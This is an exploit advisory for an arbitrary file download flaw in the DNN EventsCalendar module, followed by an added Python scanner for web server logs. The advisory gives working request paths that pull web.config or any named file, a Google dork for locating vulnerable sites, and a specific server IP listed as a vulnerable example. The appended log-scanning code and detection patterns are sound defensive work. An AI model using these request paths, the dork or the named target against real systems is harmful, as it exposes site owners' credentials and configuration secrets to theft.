- ####################################################################
- # Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/01/2019
- # Vendor Homepage : dnnsoftware.com
- # Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
- # Software Version : 1.x and All Versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
- inurl:''/desktopmodules/eventscalendar/''
- # Vulnerability Type : CWE-16 [ Configuration ]
- ####################################################################
- # Description :
- *************
- * Events Calendar is a calendar module for adding and displaying events, with time and description entered in a rich text editor.
- * DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions
- are prone to a vulnerability that lets attackers download arbitrary files because
- the application fails to sufficiently verify user-supplied input.
- * This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.
- * An attacker can download and read any file whose name is known via the '?f=' parameter.
- # Arbitrary File Download Exploit :
- *******************************
- /desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- /desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- Note : (38.95.37.77) => There are 73 domains hosted on this server.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
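
For defenders reviewing web server logs for this issue, the following added example (not part of the original advisory) flags requests to downloaddoc.aspx whose '?f=' value points outside a plain document name. The IIS W3C field order, the list of sensitive extensions and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

HANDLER = "/desktopmodules/eventscalendar/downloaddoc.aspx"  # path from the advisory
# Assumption: file types a document-download handler should never serve.
SENSITIVE_EXT = (".config", ".aspx", ".ascx", ".cs", ".vb", ".dll", ".mdf", ".resx")
# Assumed W3C field order, matching the constructed sample below.
FIELDS = ("date", "time", "method", "stem", "query", "ip", "status")

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (%257E -> %7E -> ~)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(f_value):
    """Return the reasons an f= value looks like a file-disclosure attempt."""
    v = decode_fully(f_value).replace("\\", "/").lower()
    checks = {
        "app-root-relative path": v.startswith("~"),
        "directory traversal": ".." in v.split("/"),
        "absolute path": bool(re.match(r"/|[a-z]:/", v)),
        "sensitive file type": v.endswith(SENSITIVE_EXT),
    }
    return [name for name, hit in checks.items() if hit]

def scan(log_lines):
    """Yield (ip, status, f, reasons) for suspicious downloaddoc.aspx requests."""
    for line in log_lines:
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(FIELDS, line.split()))
        if rec.get("stem", "").lower() != HANDLER:  # IIS paths are case-insensitive
            continue
        for key, f in parse_qsl(rec.get("query", "")):
            reasons = classify(f) if key.lower() == "f" else []
            if reasons:
                yield rec["ip"], rec["status"], f, reasons

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-01-18 10:00:01 GET /desktopmodules/eventscalendar/downloaddoc.aspx f=agenda.pdf 192.0.2.10 200
2019-01-18 10:00:07 GET /DesktopModules/EventsCalendar/DownloadDoc.aspx f=~/web.config 198.51.100.7 200
2019-01-18 10:00:09 GET /desktopmodules/eventscalendar/downloaddoc.aspx F=%7E%2Fweb.config 198.51.100.7 200
2019-01-18 10:00:12 GET /default.aspx - 192.0.2.10 200
""".splitlines()

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A flagged request with status 200 means the file was likely served, so any secrets in web.config (connection strings, machine keys) should be treated as exposed and rotated.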